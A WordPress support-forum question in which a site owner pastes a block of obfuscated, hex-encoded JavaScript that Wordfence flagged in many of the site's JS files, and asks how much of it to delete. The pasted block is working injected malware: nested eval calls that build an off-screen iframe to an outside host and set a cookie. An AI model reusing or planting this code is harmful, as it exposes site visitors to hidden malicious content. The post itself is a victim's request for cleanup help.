Malware \x65\x76\x61\x6c\x28
-
Hello all !
Wordfence as detected the following malware “\x65\x76\x61\x6c\x28” in many js files !
when i open a file i found code like this :
/*97bd514b5ff47abfaec1455caff17f69*/;window["\x64\x6f"+"\x63\x75"+"\x6d\x65"+"\x6e\x74"]["\x6e\x64\x7a\x79\x62"]=["\x35\x36\x32\x33\x38\x36\x34\x33\x34\x33\x36\x33\x30\x33\x30\x33\x38\x33\x39\x33\x30\x33\x38\x36\x35\x33\x39\x36\x35\x36\x35\x33\x37\x33\x37\x33\x34\x33\x33\x33\x39\x33\x39\x36\x31\x33\x32\x36\x36\x36\x36\x36\x32\x33\x34\x33\x39\x36\x36\x33\x31\x33\x37\x32\x32\x32\x63\x32\x32\x36\x34\x33\x32\x33\x32\x33\x32\x36\x33\x33\x33\x36\x35\x33\x39\x33\x34\x36\x36\x33\x33\x33\x36\x33\x37\x36\x35\x36\x33\x36\x31\x33\x31\x36\x36\x33\x34\x33\x34\x33\x38\x36\x32\x33\x32\x33\x32\x33\x31\x33\x36\x36\x31\x33\x32\x33\x38\x33\x33\x33\x32\x33\x31\x32\x32\x32\x63\x33\x31\x32\x39\x33\x62\x37\x36\x36\x31\x37\x32\x32\x30\x37\x38\x33\x32\x33\x32\x36\x34\x37\x31\x32\x30\x33\x64\x32\x30\x36\x34\x36\x66\x36\x33\x37\x35\x36\x64\x36\x35\x36\x65\x37\x34\x32\x65\x36\x33\x37\x32\x36\x35\x36\x31","\x37\x38\x33\x62\x36\x63\x36\x35\x36\x36\x37\x34\x33\x61\x32\x64\x33\x39\x33\x39\x33\x39\x33\x39\x37\x30\x37\x38\x33\x62\x32\x37\x33\x65\x33\x63\x36\x39\x36\x36\x37\x32\x36\x31\x36\x64\x36\x35\x32\x30\x37\x33\x37\x32\x36\x33\x33\x64\x32\x37\x32\x32\x32\x62\x37\x38\x33\x32\x33\x32\x37\x31\x37\x31\x32\x62\x32\x32\x32\x37\x33\x65\x33\x63\x32\x66\x36\x39\x36\x36\x37\x32\x36\x31\x36\x64\x36\x35\x33\x65\x33\x63\x32\x66\x36\x34\x36\x39\x37\x36\x33\x65\x32\x32\x33\x62\x36\x34\x36\x66\x36\x33\x37\x35\x36\x64\x36\x35\x36\x65\x37\x34\x32\x65\x36\x32\x36\x66\x36\x34\x37\x39\x32\x65\x36\x31\x37\x30\x37\x30\x36\x35\x36\x65\x36\x34\x34\x33\x36\x38\x36\x39\x36\x63\x36\x34\x32\x38\x37\x38\x33\x32\x33\x32\x36\x34\x37\x31\x32\x39\x33\x62\x37\x64\x37\x64\x22\x3b\x66\x6f\x72\x20\x28","\x28\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x29\x7b\x76\x61\x72\x20\x64\x65\x69\x72\x65\x3d\x22\x22\x3b\x76\x61\x72\x20\x74\x65\x79\x65\x62\x3d\x22\x37\x37\x36\x39\x36\x65\x36\x34\x36\x66\x37\x37\x32\x65\x36\x66\x36\x65\x36\x63\x36\x66\x36\x31\x36\x34\x32\x30\x33\x64\x32\x30\x36\x36\x37\x35\x36\x65\x36\x33\x37\x34\x36\x39\x36\x66\x36\x65\x32\x38\x32\x39\x37\x62\x36\x36\x37\x35\x36\x65\x36\x33\x37\x34\x36\x39\x36\x66\x36\x65\x32\x30\x37\x38\x33\x32\x33\x32\x36\x32\x37\x31\x32\x38\x36\x31\x32\x63\x36\x32\x32\x63\x36\x33\x32\x39\x37\x62\x36\x39\x36\x36\x32\x38\x36\x33\x32\x39\x37\x62\x37\x36\x36\x31\x37\x32\x32\x30\x36\x34\x32\x30\x33\x64\x32\x30\x36\x65\x36\x35\x37\x37\x32\x30\x34\x34\x36\x31\x37\x34\x36\x35\x32\x38\x32\x39\x33\x62\x36\x34\x32\x65\x37\x33\x36\x35\x37","\x37\x34\x36\x35\x34\x35\x36\x63\x36\x35\x36\x64\x36\x35\x36\x65\x37\x34\x32\x38\x32\x32\x36\x34\x36\x39\x37\x36\x32\x32\x32\x39\x33\x62\x37\x36\x36\x31\x37\x32\x32\x30\x37\x38\x33\x32\x33\x32\x37\x31\x37\x31\x32\x30\x33\x64\x32\x30\x32\x32\x36\x38\x37\x34\x37\x34\x37\x30\x33\x61\x32\x66\x32\x66\x37\x36\x37\x61\x36\x31\x36\x34\x32\x65\x37\x33\x37\x34\x36\x35\x37\x32\x37\x36\x36\x31\x37\x30\x36\x66\x36\x39\x36\x64\x36\x35\x36\x65\x36\x39\x36\x63\x36\x39\x36\x31\x36\x65\x36\x31\x32\x65\x36\x39\x36\x65\x36\x36\x36\x66\x32\x66\x36\x64\x36\x35\x36\x37\x36\x31\x36\x31\x36\x34\x37\x36\x36\x35\x37\x32\x37\x34\x36\x39\x37\x61\x36\x35\x32\x66\x33\x66\x36\x62\x36\x35\x37\x39\x37\x37\x36\x66\x37\x32\x36\x34\x33\x64\x36\x35\x33\x39\x33\x34\x36\x33\x36\x31\x33\x31\x36\x34\x36","\x65\x37\x34\x32\x65\x36\x33\x36\x66\x36\x66\x36\x62\x36\x39\x36\x35\x32\x39\x33\x62\x36\x39\x36\x36\x32\x38\x36\x33\x32\x39\x32\x30\x36\x33\x32\x30\x33\x64\x32\x30\x36\x33\x35\x62\x33\x30\x35\x64\x32\x65\x37\x33\x37\x30\x36\x63\x36\x39\x37\x34\x32\x38\x32\x37\x33\x64\x32\x37\x32\x39\x33\x62\x36\x35\x36\x63\x37\x33\x36\x35\x32\x30\x37\x32\x36\x35\x37\x34\x37\x35\x37\x32\x36\x65\x32\x30\x36\x36\x36\x31\x36\x63\x37\x33\x36\x35\x33\x62\x37\x32\x36\x35\x37\x34\x37\x35\x37\x32\x36\x65\x32\x30\x36\x33\x35\x62\x33\x31\x35\x64\x32\x30\x33\x66\x32\x30\x36\x33\x35\x62\x33\x31\x35\x64\x32\x30\x33\x61\x32\x30\x36\x36\x36\x31\x36\x63\x37\x33\x36\x35\x33\x62\x37\x64\x37\x36\x36\x31\x37\x32\x32\x30\x37\x38\x33\x33\x33\x33\x36\x34\x37\x31\x32\x30\x33\x64\x32\x30\x37\x38\x33\x33","\x32\x39\x33\x62\x36\x35\x36\x63\x37\x33\x36\x35\x32\x30\x37\x32\x36\x35\x37\x34\x37\x35\x37\x32\x36\x65\x32\x30\x36\x36\x36\x31\x36\x63\x37\x33\x36\x35\x33\x62\x37\x64\x36\x36\x37\x35\x36\x65\x36\x33\x37\x34\x36\x39\x36\x66\x36\x65\x32\x30\x37\x38\x33\x33\x33\x33\x36\x32\x37\x31\x32\x38\x36\x31\x32\x39\x37\x62\x37\x36\x36\x31\x37\x32\x32\x30\x36\x32\x32\x30\x33\x64\x32\x30\x36\x65\x36\x35\x37\x37\x32\x30\x35\x32\x36\x35\x36\x37\x34\x35\x37\x38\x37\x30\x32\x38\x36\x31\x32\x62\x32\x37\x33\x64\x32\x38\x35\x62\x35\x65\x33\x62\x35\x64\x32\x39\x37\x62\x33\x31\x32\x63\x37\x64\x32\x37\x32\x39\x33\x62\x37\x36\x36\x31\x37\x32\x32\x30\x36\x33\x32\x30\x33\x64\x32\x30\x36\x32\x32\x65\x36\x35\x37\x38\x36\x35\x36\x33\x32\x38\x36\x34\x36\x66\x36\x33\x37\x35\x36\x64\x36\x35\x36","\x34\x34\x34\x36\x31\x37\x34\x36\x35\x32\x38\x36\x34\x32\x65\x36\x37\x36\x35\x37\x34\x34\x34\x36\x31\x37\x34\x36\x35\x32\x38\x32\x39\x32\x62\x36\x33\x32\x39\x33\x62\x37\x64\x36\x39\x36\x36\x32\x38\x36\x31\x32\x30\x32\x36\x32\x36\x32\x30\x36\x32\x32\x39\x32\x30\x36\x34\x36\x66\x36\x33\x37\x35\x36\x64\x36\x35\x36\x65\x37\x34\x32\x65\x36\x33\x36\x66\x36\x66\x36\x62\x36\x39\x36\x35\x32\x30\x33\x64\x32\x30\x36\x31\x32\x62\x32\x37\x33\x64\x32\x37\x32\x62\x36\x32\x32\x62\x32\x38\x36\x33\x32\x30\x33\x66\x32\x30\x32\x37\x33\x62\x32\x30\x36\x35\x37\x38\x37\x30\x36\x39\x37\x32\x36\x35\x37\x33\x33\x64\x32\x37\x32\x62\x36\x34\x32\x65\x37\x34\x36\x66\x35\x35\x35\x34\x34\x33\x35\x33\x37\x34\x37\x32\x36\x39\x36\x65\x36\x37\x32\x38\x32\x39\x32\x30\x33\x61\x32\x30\x32\x37\x32\x37","\x76\x61\x72\x20\x61\x69\x6b\x65\x65\x3d\x30\x3b\x61\x69\x6b\x65\x65\x3c\x74\x65\x79\x65\x62\x2e\x6c\x65\x6e\x67\x74\x68\x3b\x61\x69\x6b\x65\x65\x2b\x3d\x32\x29\x7b\x64\x65\x69\x72\x65\x3d\x64\x65\x69\x72\x65\x2b\x70\x61\x72\x73\x65\x49\x6e\x74\x28\x74\x65\x79\x65\x62\x2e\x73\x75\x62\x73\x74\x72\x69\x6e\x67\x28\x61\x69\x6b\x65\x65\x2c\x61\x69\x6b\x65\x65\x2b\x32\x29\x2c\x20\x31\x36\x29\x2b\x22\x2c\x22\x3b\x7d\x64\x65\x69\x72\x65\x3d\x64\x65\x69\x72\x65\x2e\x73\x75\x62\x73\x74\x72\x69\x6e\x67\x28\x30\x2c\x64\x65\x69\x72\x65\x2e\x6c\x65\x6e\x67\x74\x68\x2d\x31\x29\x3b\x65\x76\x61\x6c\x28\x65\x76\x61\x6c\x28\x27\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x28\x27\x2b\x64\x65\x69\x72\x65\x2b\x27\x29\x27\x29\x29\x3b\x7d\x29\x28\x29\x3b","\x34\x33\x37\x36\x34\x33\x38\x33\x37\x36\x35\x33\x38\x33\x35\x33\x38\x33\x30\x33\x30\x36\x35\x33\x36\x36\x35\x33\x30\x33\x38\x36\x35\x33\x30\x36\x34\x36\x31\x33\x39\x36\x33\x33\x37\x33\x34\x33\x34\x32\x32\x33\x62\x37\x38\x33\x32\x33\x32\x36\x34\x37\x31\x32\x65\x36\x39\x36\x65\x36\x65\x36\x35\x37\x32\x34\x38\x35\x34\x34\x64\x34\x63\x33\x64\x32\x32\x33\x63\x36\x34\x36\x39\x37\x36\x32\x30\x37\x33\x37\x34\x37\x39\x36\x63\x36\x35\x33\x64\x32\x37\x37\x30\x36\x66\x37\x33\x36\x39\x37\x34\x36\x39\x36\x66\x36\x65\x33\x61\x36\x31\x36\x32\x37\x33\x36\x66\x36\x63\x37\x35\x37\x34\x36\x35\x33\x62\x37\x61\x32\x64\x36\x39\x36\x65\x36\x34\x36\x35\x37\x38\x33\x61\x33\x31\x33\x30\x33\x30\x33\x30\x33\x62\x37\x34\x36\x66\x37\x30\x33\x61\x32\x64\x33\x31\x33\x30\x33\x30\x33\x30\x37\x30","\x33\x33\x36\x32\x37\x31\x32\x38\x32\x32\x36\x35\x36\x32\x33\x38\x36\x34\x33\x34\x33\x36\x33\x30\x33\x30\x33\x38\x33\x39\x33\x30\x33\x38\x36\x35\x33\x39\x36\x35\x36\x35\x33\x37\x33\x37\x33\x34\x33\x33\x33\x39\x33\x39\x36\x31\x33\x32\x36\x36\x36\x36\x36\x32\x33\x34\x33\x39\x36\x36\x33\x31\x33\x37\x32\x32\x32\x39\x33\x62\x36\x39\x36\x36\x32\x38\x32\x30\x37\x38\x33\x33\x33\x33\x36\x34\x37\x31\x32\x30\x32\x31\x33\x64\x32\x30\x32\x32\x36\x34\x33\x32\x33\x32\x33\x32\x36\x33\x33\x33\x36\x35\x33\x39\x33\x34\x36\x36\x33\x33\x33\x36\x33\x37\x36\x35\x36\x33\x36\x31\x33\x31\x36\x36\x33\x34\x33\x34\x33\x38\x36\x32\x33\x32\x33\x32\x33\x31\x33\x36\x36\x31\x33\x32\x33\x38\x33\x33\x33\x32\x33\x31\x32\x32\x32\x39\x37\x62\x37\x38\x33\x32\x33\x32\x36\x32\x37\x31\x32\x38\x32\x32\x36"];var hzhde=nebfy=window["\x64\x6f"+"\x63\x75"+"\x6d\x65"+"\x6e\x74"]["\x6e\x64\x7a\x79\x62"],ynnyn=window;eval(eval("[ynnyn[\"\x68\x7a\x68\x64\x65\"][\"\x32\"],ynnyn[\"\x6e\x65\x62\x66\x79\"][\"\x36\"],ynnyn[\"\x68\x7a\x68\x64\x65\"][\"\x35\"],ynnyn[\"\x6e\x65\x62\x66\x79\"][\"\x34\"],ynnyn[\"nebfy\"][\"\x39\"],ynnyn[\"\x6e\x65\x62\x66\x79\"][\"\x30\"],ynnyn[\"\x6e\x65\x62\x66\x79\"][\"\x33\"],ynnyn[\"\x6e\x65\x62\x66\x79\"][\"\x38\"],ynnyn[\"\x68\x7a\x68\x64\x65\"][\"\x31\"],ynnyn[\"nebfy\"][\"\x37\"]].join(\"\");"));/*97bd514b5ff47abfaec1455caff17f69*/My question : should I delete each time all this previous line or just the part that Wordence told me (\x65\x76\x61\x6c\x28)
Thank you for help ! Seb ??
- The topic ‘Malware \x65\x76\x61\x6c\x28’ is closed to new replies.
